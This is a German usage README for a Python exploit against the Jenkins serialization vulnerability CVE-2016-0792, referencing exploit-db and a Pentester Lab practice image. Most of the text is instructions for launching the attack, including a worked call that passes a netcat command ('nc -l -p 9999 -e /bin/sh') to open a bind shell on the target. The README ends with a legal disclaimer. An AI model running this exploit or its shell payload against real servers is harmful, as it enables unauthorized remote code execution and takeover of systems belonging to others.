
Exploit für Jenkins Serialisierungssicherheitslücke - CVE-2016-0792
https://www.exploit-db.com/exploits/42394/
Python 3.6.x
Die requests-Bibliothek wird für diesen Exploit benötigt
sudo pip install requests
python3
from exploit import exploit
exploit(url, command)
Wobei url die URL zum Jenkins-Server und command der auszuführende Befehl ist.
exploit('http://192.168.56.101/jenkins/', '/usr/bin/nc -l -p 9999 -e /bin/sh')
Dies wird nc ausführen und auf Port 9999 auf dem verwundbaren Rechner lauschen.
Für Demonstrationszwecke werde ich das ISO von Pentester Lab verwenden.
Die Verwendung dieser Software zum Angriff auf Ziele ohne Erlaubnis ist illegal. Ich übernehme keine Verantwortung für Schäden, die durch Nutzung dieser Software gegen das Gesetz verursacht werden.